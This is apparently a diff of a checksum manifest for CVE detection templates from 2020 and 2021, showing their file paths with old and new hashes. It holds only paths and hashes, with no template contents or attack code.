-http/cves/2020/CVE-2020-5776.yaml:3153f640ab2ca16a5e4daa05c1e902ed65a07923 -http/cves/2020/CVE-2020-5777.yaml:e7716194c740a0f75ca3ce9b584bde30dfd3a94f +http/cves/2020/CVE-2020-3452.yaml:1b1eb54e1f280d7d725db73dc03ba3710137b096 +http/cves/2020/CVE-2020-35234.yaml:f6a1b4be2289857632e0c895fb40ecb7b49af018 +http/cves/2020/CVE-2020-35338.yaml:adbdb5869905af15c5b9771a55bac1b586e93394 +http/cves/2020/CVE-2020-35476.yaml:fe5a250738f3fa817147a48c4cc60e1f600ec6b9 +http/cves/2020/CVE-2020-35489.yaml:e9777ad6dad18d3106febe26688814c77d12bc1c +http/cves/2020/CVE-2020-35580.yaml:4fdbb0bb1a8838b2d69cf5c95c2e8a22dd75a606 +http/cves/2020/CVE-2020-35598.yaml:850f02a1a9f7d651d9ae786badbfeb711de5b094 +http/cves/2020/CVE-2020-35713.yaml:42ff8791636ea6100038665218b1b1405b38f0d6 +http/cves/2020/CVE-2020-35729.yaml:a33ec25bb50a2ee8733261dddb6f24bff86afce2 +http/cves/2020/CVE-2020-35736.yaml:96bc874dd1485c0e9dab755dc8afb62075c047c8 +http/cves/2020/CVE-2020-35749.yaml:f200f0b8c39b5c604bac99dcb7958d84e43d1289 +http/cves/2020/CVE-2020-35774.yaml:4c3fa7d70fd35258eef216cb20a5925676df3c0e +http/cves/2020/CVE-2020-3580.yaml:567cbbeca24ff8ddf86c4a629048d2861900e214 +http/cves/2020/CVE-2020-35846.yaml:a6f48415558cb917df83dc0e5af39f0adac31821 +http/cves/2020/CVE-2020-35847.yaml:568e0f9bb7858d0cecc33e3743648f1556e1b5bc +http/cves/2020/CVE-2020-35848.yaml:07027df52aa81fd36ad8b07e9996b25f2f8c5f95 +http/cves/2020/CVE-2020-35951.yaml:e60d05c2e91ba120f732cf7f4cc1c6c917f5c700 +http/cves/2020/CVE-2020-35984.yaml:351fba25fa5c55c6dee46c007a08a6612484f8d7 +http/cves/2020/CVE-2020-35985.yaml:000dc9045480d537d41c2342a2b6b3575797c729 +http/cves/2020/CVE-2020-35986.yaml:0c08db9725dba00aea53bbee02cdeea9fea64fd4 +http/cves/2020/CVE-2020-35987.yaml:89a1eef6e884809b24a5c359d760f88841abdf1c +http/cves/2020/CVE-2020-36112.yaml:c4d3c8bf54dc3f8d9fd15bdf0b7e117e13116578 +http/cves/2020/CVE-2020-36289.yaml:87431c57b80c240ac3d5a21bad1a84e578ac9974 +http/cves/2020/CVE-2020-36365.yaml:3c8c02c5b839bb7a7b696690ddd4f42cfd375e26 +http/cves/2020/CVE-2020-36510.yaml:13f572be5bedd8cbd151b786642cf0b4c792c7b0 +http/cves/2020/CVE-2020-4463.yaml:fbca58d8f92f03be26920908d84710e6e465c115 +http/cves/2020/CVE-2020-5191.yaml:ab822affc91506341919dcfebe97257e184e8f8b +http/cves/2020/CVE-2020-5192.yaml:6d4417ca6b62029022105a9f2d87a405b6b1a887 +http/cves/2020/CVE-2020-5284.yaml:81806d5b3ad871155d57940cc9c2179bf3b7e64c +http/cves/2020/CVE-2020-5307.yaml:5f0368ae90e2c0cdc4beb6c77e8a3740cb11d230 +http/cves/2020/CVE-2020-5405.yaml:73d77eca5d2fb27b03a2352cbb265c277919f749 +http/cves/2020/CVE-2020-5410.yaml:0147328d4f8cf63d271c3386aa0aea38e1bfeb0f +http/cves/2020/CVE-2020-5412.yaml:f0551c027e5bd9cc260ab8cf7dc08d668ca624a8 +http/cves/2020/CVE-2020-5775.yaml:505fbc23da86555149b10796210a412f8d98261d +http/cves/2020/CVE-2020-5776.yaml:3ee5628a14d3a131bc3aef6959bdf2dbd3083281 +http/cves/2020/CVE-2020-5777.yaml:c66df632814bac973b691f36be18f444967c7eb5 http/cves/2020/CVE-2020-5847.yaml:f6517fd3307e79f7772e71cc0a1714e9b7fd8ee2 http/cves/2020/CVE-2020-5902.yaml:55dfd65e105c5ee30a15fc7a1704a47ee477c03c -http/cves/2020/CVE-2020-6171.yaml:986317049fd6dd774c80af585d9a0570e385f34a +http/cves/2020/CVE-2020-6171.yaml:0b9a5e254e9734de9f5f57fbc76a2cd2fe3d0851 http/cves/2020/CVE-2020-6207.yaml:90048b46a177dc0685fab8f625c33160de6f2ec4 http/cves/2020/CVE-2020-6287.yaml:432e7d384e17ed96a4c25b09f87c25340da8a551 -http/cves/2020/CVE-2020-6308.yaml:8a209f558836c8b6ac84c22aa6a1212b044fd02a -http/cves/2020/CVE-2020-6637.yaml:4a9adf26681c927e7dd1e8202d7d1d82ea99a621 -http/cves/2020/CVE-2020-6950.yaml:76b223800827befcdcc57aae71e0833463f9fd33 -http/cves/2020/CVE-2020-7107.yaml:f322024d224c3ec82c56a3cd1db979bbe1b6dc76 -http/cves/2020/CVE-2020-7136.yaml:3bdc17d2e65685f98ffd6aa60ffb6992ed0cc6dd +http/cves/2020/CVE-2020-6308.yaml:9f89935313574f93e233cbf916269e39c310506f +http/cves/2020/CVE-2020-6637.yaml:a1febcd09ac18f7b45f8b896087390b5e3aeaccc +http/cves/2020/CVE-2020-6950.yaml:829c358bf1608ee7f12e6640c78b2b746b048978 +http/cves/2020/CVE-2020-7107.yaml:a1e674cd85239fde459e2f3f4f513f498740f7b5 +http/cves/2020/CVE-2020-7136.yaml:b3b24d787865b94e75df158a177f351440567b9b http/cves/2020/CVE-2020-7209.yaml:75abfd4eed3a2dac2dbaecfed1e881a5378d043d -http/cves/2020/CVE-2020-7318.yaml:ef017832010d5311b6729a849995b713849950c6 -http/cves/2020/CVE-2020-7796.yaml:5ee1580d4acdd6a35030d559eee97a659398567a -http/cves/2020/CVE-2020-7943.yaml:bc471606fc8e2af0acaeba7fba01963e5aaa8154 -http/cves/2020/CVE-2020-7961.yaml:929f407fed21eb19edaecb472fd9bd46dd3c714e +http/cves/2020/CVE-2020-7318.yaml:ec6cb5cfa6ee5d36653b6d8bfed65d2fe69a6b4b +http/cves/2020/CVE-2020-7796.yaml:a3bbb90cb74db6b0f100e2435921420a855819f4 +http/cves/2020/CVE-2020-7943.yaml:22750918e08eba905bb009b87b7b358a7d055b9a +http/cves/2020/CVE-2020-7961.yaml:4adab4d9c8fd161a3eec5904b11a928f0e1123e5 http/cves/2020/CVE-2020-7980.yaml:db41b6df4404948164e9057a667f3c6b86b5810e -http/cves/2020/CVE-2020-8115.yaml:ec37ff3961bf836702f2861b85c878a3321426f4 +http/cves/2020/CVE-2020-8115.yaml:0689eb809cebc9efaac9362145993da990260a05 http/cves/2020/CVE-2020-8163.yaml:fd06402612e0679def10db9d1d9de33ba97352b0 -http/cves/2020/CVE-2020-8191.yaml:46063afe73a6069bf39d9dd901f7a36c19cb0acb +http/cves/2020/CVE-2020-8191.yaml:4cd68a48f9668cdcbea498f6f76250e2d4048fc0 http/cves/2020/CVE-2020-8193.yaml:d943b6d960a876b558ba6a6101876fd03778037c http/cves/2020/CVE-2020-8194.yaml:5755e26bca7f961aa3ad66567cad98b715c9b5b6 -http/cves/2020/CVE-2020-8209.yaml:b534217c13f335fb356334b5d0c6acb42159e2e5 -http/cves/2020/CVE-2020-8497.yaml:96237343b113bdf1decf5f32b5b86ac71b9d38ac -http/cves/2020/CVE-2020-8512.yaml:df8b4132bb758d04f27c5fe0e26efc6ab091a897 -http/cves/2020/CVE-2020-8515.yaml:f0f8ddad2ce3137e1936a7e14c22ade79504abee -http/cves/2020/CVE-2020-8615.yaml:1accbbf1490fd0d732aad1f9eea4d756e44c3e32 -http/cves/2020/CVE-2020-8641.yaml:2b6e7b4e5cf4748c2f101b78664e7d52c44b3c98 +http/cves/2020/CVE-2020-8209.yaml:9c13901b7332bd6b1de4bb8201061c1eb0bc8904 +http/cves/2020/CVE-2020-8497.yaml:7bd56d338bbcd4ae84b6076ad0268c54d8bad5dc +http/cves/2020/CVE-2020-8512.yaml:c164f14b3dfc7a99d981a119577523e7efeace0c +http/cves/2020/CVE-2020-8515.yaml:14cf9b0830401c9390fcf0e1997869c6d41c9698 +http/cves/2020/CVE-2020-8615.yaml:a7ccc27f8054fac5a112f05087f20c0ca5cbdfde +http/cves/2020/CVE-2020-8641.yaml:391bb843a9b836019f77f077aa1020d7851670f5 http/cves/2020/CVE-2020-8644.yaml:94631139f37ca4be3871341f6a413703c61c4f23 -http/cves/2020/CVE-2020-8654.yaml:b82a3aae9a47aa5f992a6b46f465a3fa173bd65f -http/cves/2020/CVE-2020-8771.yaml:a0cc7f59212a367e8d7cd687596ac445bb8b298d -http/cves/2020/CVE-2020-8772.yaml:a2bd5d29ad9d90b3cf494080500b931fb37fc84c -http/cves/2020/CVE-2020-8813.yaml:48b9c26b011266f28d05e2e10f5034fd10056ead -http/cves/2020/CVE-2020-8982.yaml:4852af33d6d383648ddc61b53b3d57fb66bb469c -http/cves/2020/CVE-2020-9036.yaml:180dfb79cb206d4660eb6652483829fa5642d64a -http/cves/2020/CVE-2020-9043.yaml:8a3079984507fb7f501fd81fba7b3d6b1f244cb2 -http/cves/2020/CVE-2020-9047.yaml:584f70ef8431e931e64c5b9b9198c2a71de1cf72 -http/cves/2020/CVE-2020-9054.yaml:71bae0ab4a1c436887a23ac13b600d514c11f1e2 +http/cves/2020/CVE-2020-8654.yaml:f215b4ed5e53e444cd269f672d99b6ba4038e8c4 +http/cves/2020/CVE-2020-8771.yaml:e786f859dae87fc04ab740c5eef2d7a84cd2a883 +http/cves/2020/CVE-2020-8772.yaml:7ca37977125b7fb476f8ac2b3d562cf5f87f9185 +http/cves/2020/CVE-2020-8813.yaml:64ef52367ade512ae7a059fbeeae019872102aef +http/cves/2020/CVE-2020-8982.yaml:963948e629d51d77848886341abdc935cc2641a1 +http/cves/2020/CVE-2020-9036.yaml:fa240216e87a110bb35342670a5b2b53ac6674c8 +http/cves/2020/CVE-2020-9043.yaml:91a261ab3758f59d59b3271a7f2c9bd6f938951e +http/cves/2020/CVE-2020-9047.yaml:8dfdbf9c9354bf3cd13131452e8ee90143e710be +http/cves/2020/CVE-2020-9054.yaml:25d69660897c79af8c069d65a0b7c59178adc1ff http/cves/2020/CVE-2020-9315.yaml:3657abafa7e82d3df7a8a9aec48a4cc1abd25ec8 -http/cves/2020/CVE-2020-9344.yaml:2e6cdbb66354530742176eb12085c1b9aeec1b75 +http/cves/2020/CVE-2020-9344.yaml:237c8850396c9609771ed3a7acb359e1c45c203c http/cves/2020/CVE-2020-9376.yaml:e1884c7dc54ac9aaaaf94b09377ae61949e8bcf6 -http/cves/2020/CVE-2020-9402.yaml:ff88608fa13c99e01669512535d1625e6284efc2 -http/cves/2020/CVE-2020-9425.yaml:874f12c24ecd4662dc45bbc12e225cbb9e786ce7 -http/cves/2020/CVE-2020-9483.yaml:a7549d856cab999496bf5842e1b9bd4c1f7c8a5f +http/cves/2020/CVE-2020-9402.yaml:9ef60edc7ef57acaf2ee801afc3774507eb3023c +http/cves/2020/CVE-2020-9425.yaml:f3f39295794cc43d9f5455be635b43dffd85a395 +http/cves/2020/CVE-2020-9483.yaml:6686a03cf08d2f24e69941768598efa080b5708d http/cves/2020/CVE-2020-9484.yaml:815c7c2a7b9d1b8abf607e9033b8adc5d08e3b2f http/cves/2020/CVE-2020-9496.yaml:1f044636ea79356fdf85ca366d02552181a05418 -http/cves/2020/CVE-2020-9757.yaml:508f251a36d0f429e8f654142e9b5358945c272a +http/cves/2020/CVE-2020-9757.yaml:343256ff8506c810d42d9b6eacc6327b70311866 http/cves/2021/CVE-2021-1472.yaml:97bfecca2f4722d467e32cd70d02abddd22d35bd -http/cves/2021/CVE-2021-1497.yaml:9fc4d8e24465e774f29dd9b51fe014a7a9d0df96 -http/cves/2021/CVE-2021-1498.yaml:e7b29689cf5fdff36c603f4f71c9e6f20603795e -http/cves/2021/CVE-2021-1499.yaml:e3ceb7053572f39bbd15864bade47259cda942ea -http/cves/2021/CVE-2021-20031.yaml:e6ae2de06484705bbf6e6fb4a1f0e66aad0b08d1 -http/cves/2021/CVE-2021-20038.yaml:33dc111a4940d8385c9b932e60120dbdd5f85f11 +http/cves/2021/CVE-2021-1497.yaml:1af068d236d468093aa0247c57d72aa6e64fc3e7 +http/cves/2021/CVE-2021-1498.yaml:1e24ea0f625694d9148c78a26f3869af141e85fe +http/cves/2021/CVE-2021-1499.yaml:f43e3c3720734ffc2a3eaf6ba4c3b25393b9973e +http/cves/2021/CVE-2021-20031.yaml:5e0214745db9f0d15d913bdd64797f4b8c6adc4f +http/cves/2021/CVE-2021-20038.yaml:179bbc237654b50d59c3aebe2b451456d34b1ecb http/cves/2021/CVE-2021-20090.yaml:a4ffa0566c96bb048572edac36605f7232118973 -http/cves/2021/CVE-2021-20091.yaml:a299411a92c011754c2d6379a49392ac81149541 -http/cves/2021/CVE-2021-20092.yaml:856d8cf314e4003fabf840379255bd0fe197ead6 -http/cves/2021/CVE-2021-20114.yaml:3d0e0a42190d4d09033a2f5d9b719a5bcc54e342 -http/cves/2021/CVE-2021-20123.yaml:9c39518aec628d396a2f534511b576881cc4aa7c -http/cves/2021/CVE-2021-20124.yaml:8a4e894b2d964652d901352c7ce278250a7302b8 +http/cves/2021/CVE-2021-20091.yaml:0fe7e579cfae376dc8dea60eea42857254900944 +http/cves/2021/CVE-2021-20092.yaml:2fb51b3e49875fca9e806716367a6962ee7f0da2 +http/cves/2021/CVE-2021-20114.yaml:a0f249638e360bad4a0bf3d8a02621e85b6a9048 +http/cves/2021/CVE-2021-20123.yaml:03a037176de02cb20677d7e7a230340df3aaa949 +http/cves/2021/CVE-2021-20124.yaml:dd5aaee01364b16941f8aa23930279624fafe4d8 http/cves/2021/CVE-2021-20137.yaml:62ef1047f147feec4b3332ad6b23fff63c0596f2 -http/cves/2021/CVE-2021-20150.yaml:36f90a6249206128e661ca25020bf73843949b2b -http/cves/2021/CVE-2021-20158.yaml:a7fd8a1e0b13a0a542c27a941a82e03d7a07b919 -http/cves/2021/CVE-2021-20167.yaml:0029a9aaf27bb8529b6106ad01f227ebed609233 -http/cves/2021/CVE-2021-20323.yaml:dbd7e413b2173a0ec58326d6f1b7186d70480a53 -http/cves/2021/CVE-2021-20792.yaml:96cabc142f21839a8c46b0d576de9cf38dec280a +http/cves/2021/CVE-2021-20150.yaml:65f13215fd571098bece2fe58200d28d0259ce8c +http/cves/2021/CVE-2021-20158.yaml:ce6cac2733dda0dc77e519ce1d42091f898af2d5 +http/cves/2021/CVE-2021-20167.yaml:74d148e18f67f37b1e24a6648adb3a2623c10685 +http/cves/2021/CVE-2021-20323.yaml:d0ddde6772c702bcbba86de7e8419f2ac8edbf5b +http/cves/2021/CVE-2021-20792.yaml:a1f087484bdc82c3002c3b3f438ce32af453954d http/cves/2021/CVE-2021-20837.yaml:a821e04c159a69e0512585743f0cf0ed934803e1 -http/cves/2021/CVE-2021-21087.yaml:4b2db477ba2d2b5f94dd1de93b4caa260f7b10d3 -http/cves/2021/CVE-2021-21234.yaml:46968c448e1cc5986dba26fd540d20a4c4600577 +http/cves/2021/CVE-2021-21087.yaml:40be39a713bc6e79e2e31d2f27d69d9f06404c40 +http/cves/2021/CVE-2021-21234.yaml:dd3c848c51a7a92461644e7e0a737c9b93e361cf http/cves/2021/CVE-2021-21287.yaml:75130c591fbf9bd6aad57db77a519caae44aff22 http/cves/2021/CVE-2021-21307.yaml:ca94648608cb0d15f982b119247b51d0154efd4b -http/cves/2021/CVE-2021-21311.yaml:aaf3756d23ce8d179f83c88fdd1c1a8945e4bb28 -http/cves/2021/CVE-2021-21315.yaml:9005418bc0e4f4096cbcd8fb51f2e2b2e583b4bc -http/cves/2021/CVE-2021-21345.yaml:24a18d23be7c50ed523eb374e34fd33fdcad8c22 +http/cves/2021/CVE-2021-21311.yaml:43b0fb595b7520e07d8102b55035368fd62a0c58 +http/cves/2021/CVE-2021-21315.yaml:bf0dc2c8b5efe30cce86c4378734943d399d6aef +http/cves/2021/CVE-2021-21345.yaml:b5a0095403b41342666b8212af243c1597412bc4 http/cves/2021/CVE-2021-21351.yaml:5d84d377a0d325248c8da374d32ef8f881278fdc -http/cves/2021/CVE-2021-21389.yaml:743111929a88a779ed2e42c7e65ae60294bac17b -http/cves/2021/CVE-2021-21402.yaml:e5617e43cf54ec3c6f9fb83915a9e3ed308ed4c3 -http/cves/2021/CVE-2021-21479.yaml:8920f2889e995a4a15eb9e12be955bfdcff9f5fa -http/cves/2021/CVE-2021-21745.yaml:c50035acd30de541405963ee50541a41ed0ab0da -http/cves/2021/CVE-2021-21799.yaml:3f38d0d07ed61bcba9e6faba11bd9e5f9746ba90 -http/cves/2021/CVE-2021-21800.yaml:5f0d7437908e7c1523f525d3c0242be5c7eea93a -http/cves/2021/CVE-2021-21801.yaml:1da8c7e5167e43250fa81cd317e9a7aed0bb7a88 -http/cves/2021/CVE-2021-21802.yaml:7771df50fead5b93cebe61c5fd4d6d1f3eda1226 -http/cves/2021/CVE-2021-21803.yaml:d7038d7be3185d4653fe2eefd4760c4c29d3cd98 +http/cves/2021/CVE-2021-21389.yaml:25be41fc53a3438ffd1c597a5ef1bd757cb91224 +http/cves/2021/CVE-2021-21402.yaml:127e8be0f32faca67b168d501ab5da124f6e3e2f +http/cves/2021/CVE-2021-21479.yaml:9ef3d39c368a271433e228c875b1c2e0ecb92b0e +http/cves/2021/CVE-2021-21745.yaml:e0a31d82762eea0cda15f1d30b1b9eccbc5e9e24 +http/cves/2021/CVE-2021-21799.yaml:51de89edc55303059bf8e8997b6fef9f30445ba3 +http/cves/2021/CVE-2021-21800.yaml:24256430b579f2a961f1f5002a7a3518d29b8032 +http/cves/2021/CVE-2021-21801.yaml:1648888ec7d72debea7b9d5e590786959c2dc853 +http/cves/2021/CVE-2021-21802.yaml:a1f1b3ff4d5f06de95925242c50cc7d1e56d21b3 +http/cves/2021/CVE-2021-21803.yaml:80e5a757eb883b4d3e253637feadf6564f2648a6 http/cves/2021/CVE-2021-21805.yaml:3c3c0f43097f85e2a4501004935488ef6dab3cc8 -http/cves/2021/CVE-2021-21816.yaml:f51a54944e943d579986c24a41c39310961628a1 +http/cves/2021/CVE-2021-21816.yaml:6d13f41aada262c252df6325f64f1cbe22944788 http/cves/2021/CVE-2021-21881.yaml:2ffe34dd6323d89ef22e8faba52f181d7c26bc7f http/cves/2021/CVE-2021-21972.yaml:84cb59d6023063941fb0adbdd2ed34de0db43ad2 http/cves/2021/CVE-2021-21973.yaml:9ad7af1522f366171b906af28b9c445d6a872944 http/cves/2021/CVE-2021-21975.yaml:cdb3b61d0b913abc785a21a7df2bb391e41fc595 -http/cves/2021/CVE-2021-21978.yaml:37440367eb991f4cf71867605411b8ae353e4acd -http/cves/2021/CVE-2021-21985.yaml:932ebb8b757c762723a1e81b4ee14095b0a3cc80 -http/cves/2021/CVE-2021-22005.yaml:6830ba71c7ffec3e18015d91f1bcc588b1aa1448 -http/cves/2021/CVE-2021-22053.yaml:db9f11a97df95bd9f87d9b6e66443fed363a00c4 -http/cves/2021/CVE-2021-22054.yaml:2a932098f6285ca856b30e3cef6c5b068962f309 -http/cves/2021/CVE-2021-22122.yaml:6c9230a49d36ade5237e9f7b96194870db841f21 +http/cves/2021/CVE-2021-21978.yaml:abf6f71bc3bd154d6219923f4d8ca9a6bcf067f2 +http/cves/2021/CVE-2021-21985.yaml:b0510cbf6088d10c85a15709502a3205341f9070 +http/cves/2021/CVE-2021-22005.yaml:49579500258ba969404125829d0e97c19465e8ae +http/cves/2021/CVE-2021-22053.yaml:f09c021504074b52e044f3e4efddb9a9d1848abd +http/cves/2021/CVE-2021-22054.yaml:f1c4ae2923d87d9e84e3c50449f917fb2448d79b +http/cves/2021/CVE-2021-22122.yaml:40a50dab42b5c9f3b4f7a21a2dc4b7550e8bb27b http/cves/2021/CVE-2021-22145.yaml:061d6f29b3956230213b5f2765f3f7b3be613d55 http/cves/2021/CVE-2021-22205.yaml:d8ec11e15fb108ea3c81d5ece2d022efe641c046 http/cves/2021/CVE-2021-22214.yaml:84c6ce20b0da21c9ca1b605dea484294aa1ad51a http/cves/2021/CVE-2021-22502.yaml:d83a7f4e605208a5364ac504e6943ff0d1605a34 -http/cves/2021/CVE-2021-22707.yaml:3c1e82238aa4c7992a38df89b21a6f7ce0cd542a -http/cves/2021/CVE-2021-22873.yaml:70b9653f388aa9127a69c6a5eba8015d171d0957 -http/cves/2021/CVE-2021-22911.yaml:94da2cb821f8f448e1a4bac5e17ce0a3b4b273c2 +http/cves/2021/CVE-2021-22707.yaml:885371c6b08e8715bd55a17eab8a0663996cb624 +http/cves/2021/CVE-2021-22873.yaml:c33034ca44af98e22cc3dca733caf2dce6a41a96 +http/cves/2021/CVE-2021-22911.yaml:c71a81796b2db3ecc700c2917cc2390461eaba79 http/cves/2021/CVE-2021-22986.yaml:8d4709f638cbb498f9b9d8899ff09244417ca816 -http/cves/2021/CVE-2021-23241.yaml:10a6f5d44362c51d6f41b3aebf0965eac6ba6154 -http/cves/2021/CVE-2021-24145.yaml:43f45f2253d5d06c62e54f74883dc5887620a626 -http/cves/2021/CVE-2021-24146.yaml:3b74a70f5a301f901b32a4c501cdc3b5eef49e6f -http/cves/2021/CVE-2021-24150.yaml:2c47d6ade53e2671b2fcbe85c57c6a340d3fe6e6 -http/cves/2021/CVE-2021-24155.yaml:c5347f2ff82173bace6a703cfd25e6586d1e4065 -http/cves/2021/CVE-2021-24165.yaml:a66373c88c054a4435f1f754c2c7987bd46ce825 -http/cves/2021/CVE-2021-24169.yaml:5ac6b98aea4b1f9d89e48582a0762dba98998721 -http/cves/2021/CVE-2021-24176.yaml:3a91249a4419ae133713187bf702583965564486 -http/cves/2021/CVE-2021-24210.yaml:8a77dc6466a4dbeb41f0b8da730f304f5cbc8645 -http/cves/2021/CVE-2021-24214.yaml:269f1897f6f3092e48a85b88e4571f045cde1760 -http/cves/2021/CVE-2021-24215.yaml:244d34f42b95e415b070ddc3772b3178712bb10c -http/cves/2021/CVE-2021-24226.yaml:83f2a0c62ce36e6ccf774f89943fbec98ee02d2a -http/cves/2021/CVE-2021-24227.yaml:454d92481361cc5d69c5629c609ec17eb7d17c46 -http/cves/2021/CVE-2021-24235.yaml:a078f06f288e0fa09658c2f0d747444441aff86f -http/cves/2021/CVE-2021-24236.yaml:6abf1dbe80e16d90335ddb766737b2f1cdd3e5ba -http/cves/2021/CVE-2021-24237.yaml:8b6626073c728248a3786819a13013ea15174eae -http/cves/2021/CVE-2021-24239.yaml:9a9fbbabddbe77599035f4f4d4e5999f771246bd -http/cves/2021/CVE-2021-24245.yaml:e7abb5978b9a32fad898e76a8fb17b344ae6a983 -http/cves/2021/CVE-2021-24274.yaml:3f51492d276111d91dbbb687734bc305dbbf28df -http/cves/2021/CVE-2021-24275.yaml:c623247ab0197cb040df2d14690415323710dd8b -http/cves/2021/CVE-2021-24276.yaml:0b469b4696f3e33647bde488c5b8c9f6a4f4a2b1 -http/cves/2021/CVE-2021-24278.yaml:17b38f85a860bb561ef89893cd6429c4a9648719 -http/cves/2021/CVE-2021-24284.yaml:e7433d52fd63b30291d5fb6a48a7210b00bb4b5d -http/cves/2021/CVE-2021-24285.yaml:4d08bd59c0d1074300d7b1f002cb2833eb54ef67 -http/cves/2021/CVE-2021-24286.yaml:4efe15d6fd7635893d5e75921fe1c283acd81bf2 -http/cves/2021/CVE-2021-24287.yaml:5c1827d1e085e2ec985c7477da0c1bc84b4f4f68 -http/cves/2021/CVE-2021-24288.yaml:fc8938fdaebd1c7b95e99e588a1492a52794cc5b -http/cves/2021/CVE-2021-24291.yaml:b52d2084bd4d22124a747052c4f4107a4bf06a2c -http/cves/2021/CVE-2021-24298.yaml:ae20b3ba87129aeea69532eec54e0fb37d6544fe -http/cves/2021/CVE-2021-24300.yaml:4c114942137f191377b5c1070b39907371bb85fe -http/cves/2021/CVE-2021-24316.yaml:51266f318a61a8d7742a801ef8e4e110f7fae152 -http/cves/2021/CVE-2021-24320.yaml:9ca83296e907bba0690193753deb373109bd95e6 -http/cves/2021/CVE-2021-24335.yaml:a2d60b9513b2395d0ce73fa621ca00874c18f324 -http/cves/2021/CVE-2021-24340.yaml:1a7cb0a5a891083bc825e84cfdcd7b5273965c2d -http/cves/2021/CVE-2021-24342.yaml:0d8d4a006b8c96b3e830cc6c1b995e41bb28aee4 +http/cves/2021/CVE-2021-23241.yaml:2ce2bd726057c433823cf5411a608783b8e198e1 +http/cves/2021/CVE-2021-24145.yaml:9468560248617645cd2615bd421c4f98dbb18dc5 +http/cves/2021/CVE-2021-24146.yaml:0d7b91307efdbe0ac2cd0cc0ef14679a9fe753bc +http/cves/2021/CVE-2021-24150.yaml:64e1092877b40fd5c0aea23fd4584dc55e81726a +http/cves/2021/CVE-2021-24155.yaml:9afaaba81eea6e98965c7fda45d5552bfcf2a79e +http/cves/2021/CVE-2021-24165.yaml:12f391f4d860419162a3db25210d0e92d6f6c4ac +http/cves/2021/CVE-2021-24169.yaml:643e5e6ade2de257823e9f4149f087f1e83b4111 +http/cves/2021/CVE-2021-24176.yaml:aa6f0826758ee01bf442d42ed8beea8d274cff66 +http/cves/2021/CVE-2021-24210.yaml:ba1da8b52fc1c3ae9572135eddc5245306bfcee6 +http/cves/2021/CVE-2021-24214.yaml:076560d646b26b2c38cbb5cc2f903f7e1a7be839 +http/cves/2021/CVE-2021-24215.yaml:0ba03272d1d87ab54087cf3a7e309c95cf789569 +http/cves/2021/CVE-2021-24226.yaml:012144e7ea2750a9602ce18c2382bbba82b0d619 +http/cves/2021/CVE-2021-24227.yaml:bc9ddbcab0201023a6e5d679b943f092ad04d256 +http/cves/2021/CVE-2021-24235.yaml:18cfe266a594000bc63d6c21be953e673f7b1776 +http/cves/2021/CVE-2021-24236.yaml:dc44530d6f90f2b1f3383f13fb119976b9b55a0e +http/cves/2021/CVE-2021-24237.yaml:a837f59ca68b9fa4f04584d8ed0c925edca7414f +http/cves/2021/CVE-2021-24239.yaml:647284071938459d0f7d41ff67c868f497ba0fa3 +http/cves/2021/CVE-2021-24245.yaml:f36a258327bcb9d280614f7fe1a13ea62c07405b +http/cves/2021/CVE-2021-24274.yaml:fdfc8822429e7b38eb0e509a9913c35869a957ef +http/cves/2021/CVE-2021-24275.yaml:ea9c8530b54cdf9b44a3996f16227212427d0993 +http/cves/2021/CVE-2021-24276.yaml:3d1cfe7db9b588a859da0a0bbdd24a8e95fd7a2a +http/cves/2021/CVE-2021-24278.yaml:0cfbc7fea170ec94d4440d01eab616621d5e55b4 +http/cves/2021/CVE-2021-24284.yaml:90fa02a39fb80ec3a3f6ea483d75e5fad41dd972 +http/cves/2021/CVE-2021-24285.yaml:62467ff187f632a2d9c3c24dd7407a5d3047f995 +http/cves/2021/CVE-2021-24286.yaml:6c0cd396a3a589e349adade1bba33e243a9f6902 +http/cves/2021/CVE-2021-24287.yaml:9324a56a32bedd3bf7848ba1be8e72717ea2ac60 +http/cves/2021/CVE-2021-24288.yaml:59ead7ca678f75680fd0416d51bd1ee6ed472d6e +http/cves/2021/CVE-2021-24291.yaml:4f939f582a49cc548525257a335aee2d9b60498c +http/cves/2021/CVE-2021-24298.yaml:44fd5ab45ca5624eb9bfb4bfc567656780f4c17a +http/cves/2021/CVE-2021-24300.yaml:e35175f5a858d2559fabbd6d010481aa95eb9800 +http/cves/2021/CVE-2021-24316.yaml:843e15a092e8c3fd1ef2fb199f56e8487ceff673 +http/cves/2021/CVE-2021-24320.yaml:c49837a11dc22f58bc7ba503e0d9f2d638fae2ba +http/cves/2021/CVE-2021-24335.yaml:0fd5ef2d96b1b278e4b080caa736a956f6a91a5a +http/cves/2021/CVE-2021-24340.yaml:2405f1a02ba0aaa4d5539f83d5d76c8020b49172 +http/cves/2021/CVE-2021-24342.yaml:3292f5105ed12053f9117669f9ac5f85aa8c8c9f http/cves/2021/CVE-2021-24347.yaml:80091b8a106b2f188ac6e0e22dea99c2e1665208 -http/cves/2021/CVE-2021-24351.yaml:ded01785a4b75e97e0e1732b69bc2976af371c10 -http/cves/2021/CVE-2021-24358.yaml:adb7f749c1c043e880ec94aa7c9e3c739ad49b10 -http/cves/2021/CVE-2021-24364.yaml:cd7c962a2071a21eeec8faa89598e594105cb02c -http/cves/2021/CVE-2021-24370.yaml:e761990957cace23d48c6176236f95e6b636a815 -http/cves/2021/CVE-2021-24387.yaml:a4013ae1e7fe56607e72b049e7c831ee37fcc79a -http/cves/2021/CVE-2021-24389.yaml:b7d3ccd0a40e1dd79eded212a8c16c2090f4db47 -http/cves/2021/CVE-2021-24406.yaml:03fdaa0df18c1dc35e9e988f8051cddff6babeea -http/cves/2021/CVE-2021-24407.yaml:ed0d3ed3dfd8f311019f13ff307624e194746fe0 -http/cves/2021/CVE-2021-24409.yaml:079aed2441730be351754df053f8d1f2031005d4 -http/cves/2021/CVE-2021-24435.yaml:c5e3cd2f9c63b206e5eece83811a2929fb19b704 -http/cves/2021/CVE-2021-24436.yaml:7a776835155193766c14e5891edbb98a71328d13 -http/cves/2021/CVE-2021-24452.yaml:f98fe64fa24394fc7932516a198027974ebd3e6a -http/cves/2021/CVE-2021-24472.yaml:812e354819b8d71a27e65e8578f7e6dc7ba1a1fa -http/cves/2021/CVE-2021-24488.yaml:a4bf659a5680b58adaaa53b8c6366dfcad60ee44 -http/cves/2021/CVE-2021-24495.yaml:443a85f6002a1146026f739da2c3cc1d704ab284 -http/cves/2021/CVE-2021-24498.yaml:ef1e28d51c2cc354e2da8a63652163e822ed7a6c -http/cves/2021/CVE-2021-24499.yaml:14f3665e3e1a4dbad309bd67bc57801f00af6a9f -http/cves/2021/CVE-2021-24510.yaml:d2f1be0519fac8f075fa1e9a66458d86ef49902c -http/cves/2021/CVE-2021-24554.yaml:b5b9467c2e3d0e05360491e6d16456bbdf08fa05 